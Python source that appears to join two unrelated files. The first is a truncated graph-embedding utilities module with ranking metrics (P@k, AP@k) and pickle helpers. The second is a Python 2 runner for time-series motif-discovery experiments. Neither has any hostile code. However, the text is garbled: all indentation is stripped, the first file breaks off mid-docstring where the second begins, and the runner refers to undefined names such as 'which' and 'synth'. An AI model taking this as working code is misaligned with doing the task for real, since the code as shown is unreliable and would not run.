# it is OK in static case to reverse the prediction, but seems strange in dynamic case...
#if roc < 0.5:
# roc = 1.0 - roc # since binary clf, just predict the opposite if < 0.5
return roc
def ranking_precision_score(y_true, y_score, k=10):
''' Precision at rank K or P@K
y_true & y_score; array-like, shape = [n_samples]
based on https://gist.github.com/mblondel/7337391
but slightly changed based on https://ieeexplore.ieee.org/document/8329541
e.g.
y_true = [1, 0, 1, 0, 1, 0, 0, 0, 1]
y_score = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]
ranking_precision_score(y_true, y_score, k=1) = 1.0
ranking_precision_score(y_true, y_score, k=2) = 0.5
ranking_precision_score(y_true, y_score, k=3) ~ 0.667
ranking_precision_score(y_true, y_score, k=4) = 0.5
ranking_precision_score(y_true, y_score, k=5) = 0.6
ranking_precision_score(y_true, y_score, k=6) = 0.5
ranking_precision_score(y_true, y_score, k=7) ~ 0.429
ranking_precision_score(y_true, y_score, k=8) = 0.375
ranking_precision_score(y_true, y_score, k=9) ~ 0.444
'''
# unique_y = np.unique(y_true)
# if len(unique_y) > 2:
# raise ValueError("Only supported for two relevance levels.")
# pos_label = unique_y[1] # 1 as true # zero degree -> index 1 is out of bounds
pos_label = 1 # a solution to fix zero degree node case
order = np.argsort(y_score)[::-1] # return index based on ranked scores from high to low
y_pred_true = np.take(y_true, order[:k]) # predict to be true @k based on the sorted y_score and its index
n_relevant = np.sum(y_pred_true == pos_label) # predict to be true @k but how many of them are truly correct
# Divide by min(n_pos, k) such that the best achievable score is always 1.0 (note: if k>n_pos, we use fixed n_pos; otherwise use given k)
# n_pos = np.sum(y_true == pos_label)
# return float(n_relevant) / min(n_pos, k)
# instead we follow https://ieeexplore.ieee.org/document/8329541
if k == 0:
return 0
return float(n_relevant) / k
def average_precision_score(y_true, y_score, k=10):
''' Average Precision at rank K @ AP@k
y_true & y_score; array-like, shape = [n_samples]
based on https://gist.github.com/mblondel/7337391
but slightly changed based on https://ieeexplore.ieee.org/document/8329541
e.g.
y_true = [1, 0, 1, 0, 1, 0, 0, 0, 1]
y_score = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]
average_precision_score(y_true, y_score, k=1) = 1.0
average_precision_score(y_true, y_score, k=2) = 1.0
average_precision_score(y_true, y_score, k=3) ~ 0.833
average_precision_score(y_true, y_score, k=4) ~ 0.833
average_precision_score(y_true, y_score, k=5) ~ 0.756
average_precision_score(y_true, y_score, k=6) ~ 0.756
average_precision_score(y_true, y_score, k=7) ~ 0.756
average_precision_score(y_true, y_score, k=8) ~ 0.756
average_precision_score(y_true, y_score, k=9) ~ 0.678
'''
# unique_y = np.unique(y_true)
# if len(unique_y) > 2:
# raise ValueError("Only supported for two relevance levels.")
# pos_label = unique_y[1] # 1 as true # zero degree -> index 1 is out of bounds
pos_label = 1 # a solution to fix zero degree node case
# n_pos = np.sum(y_true == pos_label)
# order = np.argsort(y_score)[::-1][:min(n_pos, k)] # again, we did not follow https://gist.github.com/mblondel/7337391
order = np.argsort(y_score)[::-1][:k] # return 'top-k' index based on ranked scores from high to low
y_pred_true = np.asarray(y_true)[order] # predict to be true @k based on the sorted y_score and its index
score = 0
for i in range(len(y_pred_true)): # len(y_pred_true)=k
# only consider P@K=i if y_pred_true[i] = pas_label
if y_pred_true[i] == pos_label:
relevant = 0
# calculate P@i
for j in range(i + 1):
if y_pred_true[j] == pos_label: # relevant!
relevant += 1.0
relevant /= (i + 1.0) # note: i+1.0 since i start from 0
score += relevant
# here we did not follow https://gist.github.com/mblondel/7337391
#if n_pos == 0:
# return 0
#return score / n_pos
# instead we follow https://ieeexplore.ieee.org/document/8329541
n_relevant = np.sum(y_pred_true == pos_label) # n_relevant = num of true positive = num of times of "score += relevant" executes!
if n_relevant == 0:
return 0
return score / float(n_relevant)
def pk_and_apk_score(y_true, y_score, k_list):
''' P@k and AP@k at same time
k here should be a list, e.g., k_list=[10] or k_list=[10, 100, 1000, ...]
TODO: can be futher speeded up by vectorized implementation!
e.g.
y_true = [1, 0, 1, 0, 1, 0, 0, 0, 1]
y_score = [0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]
k_list = [1,2,3,4,5,6,7,8,9]
pk_and_apk_score(y_true, y_score, k_list) ->
[1.0, 0.5, 0.6666666666666666, 0.5, 0.6, 0.5, 0.42857142857142855, 0.375, 0.4444444444444444],
[1.0, 1.0, 0.8333333333333333, 0.8333333333333333, 0.7555555555555555, 0.7555555555555555, 0.7555555555555555, 0.7555555555555555, 0.6777777777777778]
'''
pos_label = 1
order = np.argsort(y_score)[::-1] # sort once for all; to speedup
pk_list = []
apk_list = []
for k in k_list:
y_pred_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_pred_true == pos_label)
if k == 0:
pk_list.append(0)
else:
pk_list.append(float(n_relevant)/k) # P@k
score = 0
for i in range(len(y_pred_true)):
if y_pred_true[i] == pos_label:
relevant = 0
for j in range(i + 1): # calculate P@i
if y_pred_true[j] == pos_label:
relevant += 1.0
relevant /= (i + 1.0)
score += relevant
if n_relevant == 0:
apk_list.append(0)
else:
apk_list.append(score/float(n_relevant)) # AP@k
return pk_list, apk_list
# ----------------------------------------------------------------------------------
# ------------------------------- graph related operation --------------------------
# ----------------------------------------------------------------------------------
def edge_s1_minus_s0(s1, s0, is_directed=False):
''' s1 and s0: edge/node-pairs set
'''
if not is_directed:
s1_reordered = set( (a,b) if a<b else (b,a) for a,b in s1 )
s0_reordered = set( (a,b) if a<b else (b,a) for a,b in s0 )
return s1_reordered-s0_reordered
else:
print('currently not support directed case')
def unique_nodes_from_edge_set(edge_set):
''' take out unique nodes from edge set
'''
unique_nodes = []
for a, b in edge_set:
if a not in unique_nodes:
unique_nodes.append(a)
if b not in unique_nodes:
unique_nodes.append(b)
return unique_nodes
def row_as_probdist(mat, dense_output=False, preserve_zeros=False):
'''Make each row of matrix sums up to 1.0, i.e., a probability distribution.
Support both dense and sparse matrix.
Attributes
----------
mat : scipy sparse matrix or dense matrix or numpy array
The matrix to be normalized
dense_output : bool
whether forced dense output
perserve_zeros : bool
If False, for row with all entries 0, we normalize it to a vector with all entries 1/n.
Leave 0 otherwise
Returns
-------
dense or sparse matrix:
return dense matrix if input is dense matrix or numpy array
return sparse matrix for sparse matrix input
(note: np.array & np.matrix are diff; and may cause some dim issues...)
'''
row_sum = np.array(mat.sum(axis=1)).ravel() # type: np.array
zero_rows = row_sum == 0
row_sum[zero_rows] = 1
diag = sparse.dia_matrix((1 / row_sum, 0), (mat.shape[0], mat.shape[0]))
mat = diag.dot(mat)
if not preserve_zeros:
mat += sparse.csr_matrix(zero_rows.astype(int)).T.dot(sparse.csr_matrix(np.repeat(1 / mat.shape[1], mat.shape[1])))
if dense_output and sparse.issparse(mat):
return mat.todense()
return mat
# ----------------------------------------------------------------------------
# --------------------------------- files I/O --------------------------------
# ----------------------------------------------------------------------------
def load_any_obj_pkl(path):
''' load any object from pickle file
'''
with open(path, 'rb') as f:
any_obj = pickle.load(f)
return any_obj
def save_any_obj_pkl(obj, path):
''' save any object to pickle file
'''
with open(path, 'wb') as f:
pickle.dump(obj, f, protocol=pickle.HIGHEST_PROTOCOL)
def save_emb(emb_dict, path):
''' save embeddings to | |
#!/usr/env/python
# This file was used to run official experiments
import os
import sys
import numpy as np
import pandas as pd
from ..datasets.datasets import DataLoader
from ..utils import learn
from ..utils.files import ensureDirExists
from ..utils.misc import nowAsString
from estimators import * # TODO don't do this
# ================================================================ Constants
# OFFICIAL_SAVE_DIR_FIG = 'figs/official/'
# OFFICIAL_SAVE_DIR_RESULTS = 'results/official/'
OFFICIAL_SAVE_DIR_FIG = 'figs/unofficial/'
OFFICIAL_SAVE_DIR_RESULTS = 'results/unofficial/'
# ------------------------ Default extractor / preprocesssing parameters
DEFAULT_DOWNSAMPLE_BY = 2
DEFAULT_LENGTHS = [1./20, 1./10]
DEFAULT_LENGTH_STEP = 5
DEFAULT_FRACTIONS_NOISE_DIMS = [1.] # run with orig data separately
DEFAULT_FRACTIONS_ADVERSARIAL_DIMS = [1.]
# ------------------------ Algorithms
ALGO_MDL = 'mdl'
ALGO_MINNEN = 'minnen'
ALGO_OUTCAST = 'outcast'
ALGO_FF = 'ff'
ALL_ALGORITHMS = [ALGO_MDL, ALGO_MINNEN, ALGO_FF] # ignore outcast
DEFAULT_MINNEN_PARAMS = [{
'lengthStep': [DEFAULT_LENGTH_STEP],
'threshAlgo': ['minnen'],
}]
DEFAULT_MDL_PARAMS = [{
'lengthStep': [DEFAULT_LENGTH_STEP],
'threshAlgo': ['mdl'],
'mdlBits': [6],
'mdlAbandonCriterion': ['allNegative'],
}]
DEFAULT_FF_PARAMS = [{
'includeLocalSlope': [True],
'detrend': [True],
'ignoreFlat': [True]
}]
PARAMS_FOR_ALGO = {
ALGO_MINNEN: DEFAULT_MINNEN_PARAMS,
ALGO_MDL: DEFAULT_MDL_PARAMS,
ALGO_FF: DEFAULT_FF_PARAMS
}
# ------------------------ Dataset names
DATASET_MSRC = 'msrc'
DATASET_TIDIGITS = 'tidigits'
DATASET_UCR = 'ucr'
DATASET_UCR_PAIRS = 'ucr_pairs'
DATASET_DISHWASHER = 'dishwasher'
DATASET_DISHWASHER_2 = 'dishwasher_2'
DATASET_DISHWASHER_3 = 'dishwasher_3'
DATASET_DISHWASHER_SHORT = 'dishwasher_short'
DATASET_DISHWASHER_GROUPS = 'dishwasher_groups'
DATASET_DISHWASHER_PAIRS = 'dishwasher_pairs'
DATASET_TRIANGLES = 'triangles'
DATASET_RECTS = 'rects'
DATASET_SINES = 'sines'
DATASET_SHAPES = 'shapes'
DATASET_SYNTHETIC = 'synthetic'
DATASET_RAND_WALK = 'randwalk'
# ------------------------ Dataset params
DEV_SEED = 12345
TEST_SEED = 123
SEED = DEV_SEED
# SEED = TEST_SEED
DEFAULT_INSTANCES_PER_TS = 5
MSRC_PARAMS = [{'datasetName': ['msrc'],
'whichExamples': [None],
'seed': [SEED]
}]
TIDIGITS_PARAMS = [{'datasetName': ['tidigits_grouped_mfccs'],
'whichExamples': [None],
'instancesPerTs': [DEFAULT_INSTANCES_PER_TS],
'seed': [SEED]
}]
UCR_TS_PER_DATASET = 50
UCR_PARAMS = [{'datasetName': ['ucr_short'],
'whichExamples': [range(UCR_TS_PER_DATASET)],
'instancesPerTs': [DEFAULT_INSTANCES_PER_TS],
'seed': [SEED]
}]
UCR_PAIRS_TS_PER_DATASET = 20
UCR_PAIRS_PARAMS = [{'datasetName': ['ucr_pairs'],
'whichExamples': [range(UCR_PAIRS_TS_PER_DATASET)],
'instancesPerTs': [2],
'seed': [SEED]
}]
DISHWASHER_PARAMS = [{'datasetName': ['dishwasher']}]
DISHWASHER_2_PARAMS = [{'datasetName': ['dishwasher_2']}]
DISHWASHER_3_PARAMS = [{'datasetName': ['dishwasher_3']}]
DISHWASHER_SHORT_PARAMS = [{'datasetName': ['dishwasher_short']}]
DISHWASHER_GROUPS_PARAMS = [{'datasetName': ['dishwasher_groups'],
'whichExamples': [None],
'instancesPerTs': [DEFAULT_INSTANCES_PER_TS],
'seed': [SEED]
}]
DISHWASHER_PAIRS_PARAMS = [{'datasetName': ['dishwasher_pairs'],
'whichExamples': [None],
'instancesPerTs': [2], # "aim for" 2
'minNumInstances': [2], # enforce at least 2
'maxNumInstances': [2], # enforce exactly 2
'seed': [SEED]
}]
# synthetic data for prototyping
SYNTHETIC_TS_PER_TYPE = 50
TRIANGLES_PARAMS = [{'datasetName': ['triangles']}]
RECTS_PARAMS = [{'datasetName': ['rects']}]
SINES_PARAMS = [{'datasetName': ['sines']}]
SHAPES_PARAMS = [{'datasetName': ['shapes']}]
SYNTHETIC_PARAMS = [{'datasetName': [['triangles', 'rects', 'shapes']],
'whichExamples': [range(SYNTHETIC_TS_PER_TYPE)],
}]
RAND_WALK_PARAMS = [{'datasetName': ['randwalk']}]
# ------------------------ Names -> Params
PARAMS_FOR_DATASET = {
DATASET_MSRC: MSRC_PARAMS,
DATASET_TIDIGITS: TIDIGITS_PARAMS,
DATASET_UCR: UCR_PARAMS,
DATASET_UCR_PAIRS: UCR_PAIRS_PARAMS,
DATASET_DISHWASHER: DISHWASHER_PARAMS,
DATASET_DISHWASHER_2: DISHWASHER_2_PARAMS,
DATASET_DISHWASHER_3: DISHWASHER_3_PARAMS,
DATASET_DISHWASHER_SHORT: DISHWASHER_SHORT_PARAMS,
DATASET_DISHWASHER_GROUPS: DISHWASHER_GROUPS_PARAMS,
DATASET_DISHWASHER_PAIRS: DISHWASHER_PAIRS_PARAMS,
DATASET_TRIANGLES: TRIANGLES_PARAMS,
DATASET_RECTS: RECTS_PARAMS,
DATASET_SINES: SINES_PARAMS,
DATASET_SHAPES: SHAPES_PARAMS,
DATASET_SYNTHETIC: SYNTHETIC_PARAMS,
DATASET_RAND_WALK: RAND_WALK_PARAMS
}
# ================================================================ Utils
def find_pattern(algo, datasetKey, saveDirFig, saveDirResults,
fractionsAdversarialDims=None, fractionsNoiseDims=None,
downsampleBy=2, lengths=DEFAULT_LENGTHS, lengthStep=DEFAULT_LENGTH_STEP,
ignorePositions=True, requireContainment=False, mdlSearchEachTime=True,
whichExamples=None, instancesPerTs=None, onlyReturnPair=False,
forceNumDims=None, seedShiftStep=0., keepWhichDims=None):
np.random.seed(SEED)
if lengths is None:
lengths = np.arange(1./20, 1./8, .005)
maxOverlapFractions = [.25]
saveDirResults = os.path.join(saveDirResults, algo)
if saveDirFig:
saveDirFig = os.path.join(saveDirFig, algo)
if fractionsNoiseDims and any([frac > 0. for frac in fractionsNoiseDims]):
saveDirFig = os.path.join(saveDirFig, 'noise')
elif fractionsAdversarialDims and any([frac > 0. for frac in fractionsAdversarialDims]):
saveDirFig = os.path.join(saveDirFig, 'adversarial')
if not fractionsNoiseDims:
fractionsNoiseDims = [0.]
if not fractionsAdversarialDims:
fractionsAdversarialDims = [0.]
print "find_pattern(): using noise dim fractions: ", fractionsNoiseDims
print "find_pattern(): using adversarial dim fractions: ", fractionsAdversarialDims
# ------------------------ motif discovery object + params
if algo == ALGO_MDL:
finderParams = [
{'lengths': [lengths],
'lengthStep': [lengthStep],
'downsampleBy': [downsampleBy],
'onlyReturnPair': [onlyReturnPair],
'threshAlgo': ['mdl'],
'mdlBits': [6],
# 'mdlAbandonCriterion': ['bestPairNegative', 'allNegative'],
'mdlAbandonCriterion': ['allNegative'],
'mdlSearchEachTime': [mdlSearchEachTime],
'maxOverlapFraction': maxOverlapFractions,
'ignorePositions': [ignorePositions],
'requireContainment': [requireContainment],
'forceNumDims': [forceNumDims],
'seedShiftStep': [seedShiftStep],
# 'saveMotifsDir': [saveDirFig],
},
]
motifFinding = (MotifExtractor(), finderParams)
elif algo == ALGO_MINNEN:
# all instances, no added data
finderParams = [
{'lengths': [lengths],
'lengthStep': [lengthStep],
'downsampleBy': [downsampleBy],
'onlyReturnPair': [onlyReturnPair],
'threshAlgo': ['minnen'],
'maxOverlapFraction': maxOverlapFractions,
'ignorePositions': [ignorePositions],
'requireContainment': [requireContainment],
'forceNumDims': [forceNumDims],
'seedShiftStep': [seedShiftStep],
# 'saveMotifsDir': [saveDirFig]
},
]
motifFinding = (MotifExtractor(), finderParams)
elif algo == ALGO_OUTCAST:
finderParams = [
{'Lmin': [np.min(lengths)],
'Lmax': [np.max(lengths)],
'lengthStep': [lengthStep], # just for spacing small lengths
'downsampleBy': [downsampleBy],
'ignorePositions': [ignorePositions],
'requireContainment': [requireContainment],
# 'saveMotifsDir': [saveDirFig],
},
]
motifFinding = (OutcastExtractor(), finderParams)
elif algo == ALGO_FF:
finderParams = [
{'Lmin': [np.min(lengths)],
'Lmax': [np.max(lengths)],
'logX': [False],
'logXblur': [False],
'downsampleBy': [downsampleBy],
# 'includeLocalZnorm': [False],
# 'includeLocalZnorm': [True],
# 'includeLocalSlope': [False],
# 'includeLocalSlope': [True],
# 'includeSaxHashes': [False],
# 'includeSaxHashes': [True], # drowns out local slopes
# 'includeMaxFilteredSlope': [False],
# 'includeMaxFilteredSlope': [True],
'includeNeighbors': [True],
# 'includeVariance': [True],
'saxCardinality': [3],
'saxWordLen': [3],
# 'detrend': [True],
'detrend': [False],
'ignoreFlat': [True],
'ignorePositions': [ignorePositions],
'requireContainment': [requireContainment],
# 'saveMotifsDir': [saveDirFig],
},
]
motifFinding = (FFExtractor(), finderParams)
else:
raise ValueError("Unrecognized algorithm {}!".format(algo))
# ------------------------ other objects + params
datasetParams = PARAMS_FOR_DATASET[datasetKey]
if whichExamples:
datasetParams[0]['whichExamples'] = [whichExamples]
if instancesPerTs:
datasetParams[0]['instancesPerTs'] = [instancesPerTs]
dataLoading = [DataLoader(), datasetParams]
dimAddingParams = [{'fractionAdversarialDims': fractionsAdversarialDims,
'fractionNoiseDims': fractionsNoiseDims}]
dimAdding = [DimsAppender(), dimAddingParams]
# ------------------------ main
d = [("DataLoading", [dataLoading]),
("DimAdding", [dimAdding]),
("FindMotif", [motifFinding])
]
# add option to only use some dimensions of the ts
if keepWhichDims is not None and len(keepWhichDims):
dimSelectingParams = [{'whichDims': [keepWhichDims]}]
dimSelecting = (DimsSelector(), dimSelectingParams)
stage = ("SelectDims", [dimSelecting])
d.insert(1, stage) # insert right after loading data
df = learn.tryParams(d, None, None, crossValidate=False)
ensureDirExists(saveDirResults)
fileName = "{}.csv".format(nowAsString())
df.to_csv(os.path.join(saveDirResults, fileName))
return df
class Experiment(object):
"""Class to enforce passing in all of the parameters (and provide a
clean interface to functions that need these params)"""
def __init__(self, algo, dataset, downsampleBy, ignorePositions,
requireContainment=False,
lengths=DEFAULT_LENGTHS, lengthStep=DEFAULT_LENGTH_STEP,
fractionsNoiseDims=DEFAULT_FRACTIONS_NOISE_DIMS,
fractionsAdversarialDims=DEFAULT_FRACTIONS_ADVERSARIAL_DIMS,
saveFig=True):
self.algo = algo
self.dataset = dataset
self.downsampleBy = downsampleBy
self.ignorePositions = ignorePositions
self.requireContainment = requireContainment
self.lengths = lengths
self.lengthStep = lengthStep
self.fractionsNoiseDims = fractionsNoiseDims
self.fractionsAdversarialDims = fractionsAdversarialDims
subdir = ''.join(dataset)
print "Experiment: using subdir: ", subdir
self.saveDirFig = ""
if saveFig:
self.saveDirFig = os.path.join(OFFICIAL_SAVE_DIR_FIG, subdir)
self.saveDirRes = os.path.join(OFFICIAL_SAVE_DIR_RESULTS, subdir)
def run(self, original=False, noise=False, adversarial=False, **kwargs):
saveDirFig = self.saveDirFig
saveDirRes = self.saveDirRes
algo = self.algo
dataset = self.dataset
# dataset = kwargs.get('dataset', self.dataset)
# kwargs.pop('dataset')
# print "run(): using dataset {} (default is {})".format(dataset, self.dataset)
# kwargs.setdefault('lengths', self.lengths) # hack to allow lengths as kwarg
lengths = self.lengths
lengthStep = self.lengthStep
downsampleBy = self.downsampleBy
fractionsNoiseDims = self.fractionsNoiseDims
fractionsAdversarialDims = self.fractionsAdversarialDims
ignorePositions = self.ignorePositions
requireContainment = self.requireContainment
if not (original or noise or adversarial):
original = True # default to running on original data
if original: # original dims
find_pattern(algo, dataset, saveDirFig, saveDirRes,
lengths=lengths, lengthStep=lengthStep, downsampleBy=downsampleBy,
ignorePositions=ignorePositions,
requireContainment=requireContainment, **kwargs)
if noise: # noise dims
find_pattern(algo, dataset, saveDirFig, saveDirRes,
lengths=lengths, lengthStep=lengthStep, downsampleBy=downsampleBy,
ignorePositions=ignorePositions,
requireContainment=requireContainment,
fractionsNoiseDims=fractionsNoiseDims, **kwargs)
if adversarial: # adversarial dims
find_pattern(algo, dataset, saveDirFig, saveDirRes,
lengths=lengths, lengthStep=lengthStep, downsampleBy=downsampleBy,
ignorePositions=ignorePositions,
requireContainment=requireContainment,
fractionsAdversarialDims=fractionsAdversarialDims, **kwargs)
# ============================================================== Official Stuff
# ------------------------------------------------ experiment creation / params
def create_msrc_experiment(algo):
return Experiment(algo, DATASET_MSRC, downsampleBy=2, ignorePositions=True)
# return Experiment(algo, DATASET_MSRC, downsampleBy=5, ignorePositions=True)
def create_tidigits_experiment(algo):
return Experiment(algo, DATASET_TIDIGITS, downsampleBy=2,
# ignorePositions=False, requireContainment=True, lengths=[1./16, 1./8])
ignorePositions=False, requireContainment=False, lengths=[1./16, 1./8])
def create_dishwasher_experiment(algo):
return Experiment(algo, DATASET_DISHWASHER_GROUPS, downsampleBy=1, ignorePositions=False)
# return Experiment(algo, DATASET_DISHWASHER_GROUPS, downsampleBy=5, ignorePositions=False)
def create_ucr_experiment(algo):
return Experiment(algo, DATASET_UCR, downsampleBy=2, ignorePositions=False)
# ------------------------------------------------ mdl
def run_msrc_mdl(**kwargs):
create_msrc_experiment(ALGO_MDL).run(**kwargs)
def run_tidigits_mdl(**kwargs):
create_tidigits_experiment(ALGO_MDL).run(**kwargs)
def run_dishwasher_mdl(**kwargs):
create_dishwasher_experiment(ALGO_MDL).run(**kwargs)
def run_ucr_mdl(**kwargs):
create_ucr_experiment(ALGO_MDL).run(**kwargs)
# ------------------------------------------------ minnen
def run_msrc_minnen(**kwargs):
create_msrc_experiment(ALGO_MINNEN).run(**kwargs)
def run_tidigits_minnen(**kwargs):
create_tidigits_experiment(ALGO_MINNEN).run(**kwargs)
def run_dishwasher_minnen(**kwargs):
create_dishwasher_experiment(ALGO_MINNEN).run(**kwargs)
def run_ucr_minnen(**kwargs):
create_ucr_experiment(ALGO_MINNEN).run(**kwargs)
# ------------------------------------------------ outcast
def run_msrc_outcast(**kwargs):
create_msrc_experiment(ALGO_OUTCAST).run(**kwargs)
def run_tidigits_outcast(**kwargs):
create_tidigits_experiment(ALGO_OUTCAST).run(**kwargs)
def run_dishwasher_outcast(**kwargs):
create_dishwasher_experiment(ALGO_OUTCAST).run(**kwargs)
def run_ucr_outcast(**kwargs):
create_ucr_experiment(ALGO_OUTCAST).run(**kwargs)
# ------------------------------------------------ ffs
def run_msrc_ff(**kwargs):
create_msrc_experiment(ALGO_FF).run(**kwargs)
def run_tidigits_ff(**kwargs):
create_tidigits_experiment(ALGO_FF).run(**kwargs)
def run_dishwasher_ff(**kwargs):
create_dishwasher_experiment(ALGO_FF).run(**kwargs)
def run_ucr_ff(**kwargs):
create_ucr_experiment(ALGO_FF).run(**kwargs)
# ------------------------------------------------ best pairs
def run_dishwasher_pairs_motif(**kwargs):
e = Experiment(ALGO_MINNEN, DATASET_DISHWASHER_PAIRS, downsampleBy=1,
ignorePositions=False, lengths=[150])
e.run(onlyReturnPair=True, **kwargs)
def run_dishwasher_pairs_ff(**kwargs):
e = Experiment(ALGO_FF, DATASET_DISHWASHER_PAIRS, downsampleBy=1,
ignorePositions=False, lengths=[100, 200])
e.run(**kwargs)
def run_ucr_pairs_motif(**kwargs):
e = Experiment(ALGO_MINNEN, DATASET_UCR_PAIRS, downsampleBy=2,
ignorePositions=False, lengths=[.17])
e.run(onlyReturnPair=True, **kwargs)
def run_ucr_pairs_ff(**kwargs):
e = Experiment(ALGO_FF, DATASET_UCR_PAIRS, downsampleBy=2,
ignorePositions=False, lengths=[.1, .2])
e.run(**kwargs)
def run_synthetic_pairs_motif(**kwargs):
e = Experiment(ALGO_MINNEN, DATASET_SYNTHETIC, downsampleBy=1,
ignorePositions=False, lengths=[50])
e.run(onlyReturnPair=True, **kwargs)
def run_synthetic_pairs_ff(**kwargs):
e = Experiment(ALGO_FF, DATASET_SYNTHETIC, downsampleBy=1,
ignorePositions=False, lengths=[.1, .2])
e.run(instancesPerTs=2, **kwargs)
# ------------------------------------------------ scalability
DEFAULT_SCALABILITY_M_LENGTHS = np.arange(50, 100)
DEFAULT_SCALABILITY_N = 5000
SCALABIILTY_N_FOR_M_LENGTHS = 5000
# DEFAULT_SCALABILITY_N = 1100 # TODO remove after test
# DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000, 2000, 4000, 8000, 16000]
DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000, 2000, 4000, 8000]
# DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000]
# DEFAULT_SCALABILITY_N_LENGTHS = [500, 1000] # TODO remove after test
DEFAULT_SCALABILITY_M_LENGTH_MINS_MAXES = [[50, 100],
[100, 150],
[150, 200],
[200, 250],
[250, 300],
[300, 350],
[350, 400]]
# [350, 400],
# [400, 450],
# [450, 500]]
DEFAULT_SCALABILITY_M_SPAN_MINS_MAXES = [[150, 151],
[140, 160],
[130, 170],
[120, 180],
[110, 190],
[100, 200]]
# [90, 210],
# [80, 220],
# [70, 230],
# [60, 240],
# [50, 250]]
SCALABILITY_RESULTS_DIR = os.path.join(OFFICIAL_SAVE_DIR_RESULTS, 'scalability')
SCALABILITY_TEST_N_LENGTH = 'n_length'
SCALABILITY_TEST_M_LENGTH = 'm_length'
SCALABILITY_TEST_M_SPAN = 'm_span'
SCALABILITY_ALL_TESTS = [SCALABILITY_TEST_N_LENGTH, SCALABILITY_TEST_M_LENGTH,
SCALABILITY_TEST_M_SPAN]
def save_data_frame(df, saveDir):
ensureDirExists(saveDir)
fileName = "{}.csv".format(nowAsString())
df.to_csv(os.path.join(saveDir, fileName))
def find_pattern_simple(datasetKey, algoKey, datasetParams=None, algoParams=None,
saveDir=None):
if not datasetParams:
datasetParams = PARAMS_FOR_DATASET[datasetKey]
if not algoParams:
algoParams = PARAMS_FOR_ALGO[algoKey]
print "datasetParams", datasetParams
print "algoParams", algoParams
if algoKey == ALGO_MINNEN or algoKey == ALGO_MDL:
algoObj = MotifExtractor()
elif algoKey == ALGO_FF:
algoObj = FFExtractor()
dataLoading = [DataLoader(), datasetParams]
motifFinding = [algoObj, algoParams]
d = [("DataLoading", [dataLoading]),
("FindMotif", [motifFinding])
]
df = learn.tryParams(d, None, None, crossValidate=False)
if saveDir:
save_data_frame(df, saveDir)
return df
def setLengthsInAlgoParams(algoKey, algoParams, lengths):
if algoKey == ALGO_FF:
minLen = np.min(lengths)
maxLen = np.max(lengths)
algoParams[0].update({'Lmin': [minLen], 'Lmax': [maxLen]})
else:
algoParams[0].update({'lengths': [lengths]})
algoParams[0].update({'lengthStep': [1]})
def test_scalability(datasetKey, algoKey, whichTest=None, iterNum=1):
if iterNum < 1:
raise ValueError("Iteration number must be >= 1! Got {}".format(iterNum))
datasetParams = PARAMS_FOR_DATASET[datasetKey]
datasetParams[0]['seed'] = [iterNum] # different across iterations
algoParams = PARAMS_FOR_ALGO[algoKey]
nLengths = np.array(DEFAULT_SCALABILITY_N_LENGTHS)
mLengths = []
for pair in DEFAULT_SCALABILITY_M_LENGTH_MINS_MAXES:
mLengths.append(np.arange(pair[0], pair[1]))
mSpans = []
for pair in DEFAULT_SCALABILITY_M_SPAN_MINS_MAXES:
mSpans.append(np.arange(pair[0], pair[1]))
saveDir = os.path.join(SCALABILITY_RESULTS_DIR, datasetKey, algoKey, whichTest)
dfs = []
subdir = os.path.join(saveDir, 'incremental-{}'.format(iterNum))
if whichTest == SCALABILITY_TEST_N_LENGTH:
setLengthsInAlgoParams(algoKey, algoParams, DEFAULT_SCALABILITY_M_LENGTHS)
for n in nLengths:
datasetParams[0]['cropDataLength'] = [n]
df = find_pattern_simple(datasetKey, algoKey, datasetParams, algoParams,
saveDir=subdir)
dfs.append(df)
elif whichTest == SCALABILITY_TEST_M_LENGTH:
datasetParams[0]['cropDataLength'] = [SCALABIILTY_N_FOR_M_LENGTHS]
for lengths in mLengths:
setLengthsInAlgoParams(algoKey, algoParams, lengths)
df = find_pattern_simple(datasetKey, algoKey, datasetParams, algoParams,
saveDir=subdir)
dfs.append(df)
elif whichTest == SCALABILITY_TEST_M_SPAN:
datasetParams[0]['cropDataLength'] = [DEFAULT_SCALABILITY_N]
for lengths in mSpans:
setLengthsInAlgoParams(algoKey, algoParams, lengths)
df = find_pattern_simple(datasetKey, algoKey, datasetParams, algoParams,
saveDir=subdir)
dfs.append(df)
else:
raise ValueError("can't run unknown scalability test {}!".format(which))
df = pd.concat(dfs, ignore_index=True)
df['iter'] = pd.Series(np.zeros(df.shape[0]) + iterNum)
save_data_frame(df, saveDir)
# recurse to iterate multiple times
if iterNum > 1:
df2 = test_scalability(datasetKey, algoKey, whichTest, iterNum - 1)
df = pd.concat([df, df2], ignore_index=True)
return df
def run_scalability_experiments(datasets=None, algorithms=None, tests=None, numIters=1):
if not datasets:
datasets = [DATASET_RAND_WALK, DATASET_DISHWASHER]
if not algorithms:
algorithms = [ALGO_MINNEN, ALGO_MDL, ALGO_FF]
if not tests:
tests = SCALABILITY_ALL_TESTS
# wrap single strings in a list
datasets = synth.ensureIsCollection(datasets)
algorithms = synth.ensureIsCollection(algorithms)
tests = synth.ensureIsCollection(tests)
for dataset in datasets:
for algo in algorithms:
for test in tests:
print "SCALABILITY: testing {} {} {}".format(
dataset, algo, test)
test_scalability(dataset, algo, test, numIters)
# ================================================================ Main
def main():
# run_scalability_experiments(algorithms=ALGO_FF)
# run_scalability_experiments(algorithms=ALGO_MINNEN)
# run_tidigits_outcast(whichExamples=range(5))
# run_ucr_outcast(whichExamples=range(1))
# ------------------------ best pair experiments
# run_synthetic_pairs_motif()
# run_synthetic_pairs_ff(whichExamples=range(20))
# run_ucr_ff(whichExamples=range(1))
# run_ucr_ff(whichExamples=range(3))
# run_ucr_pairs_motif()
# run_ucr_pairs_ff(whichExamples=range(1))
# run_dishwasher_pairs_motif(whichExamples=range(2))
# run_dishwasher_pairs_ff(whichExamples=range(5))
# run_tidigits_ff(original=True, whichExamples=range(1))
# run_tidigits_ff(original=True, whichExamples=range(5))
run_tidigits_ff(original=True, whichExamples=range(10))
# run_tidigits_ff(original=True, whichExamples=[range(50)])
# run_msrc_ff(original=True, whichExamples=range(1))
# run_msrc_ff(original=True, whichExamples=range(10))
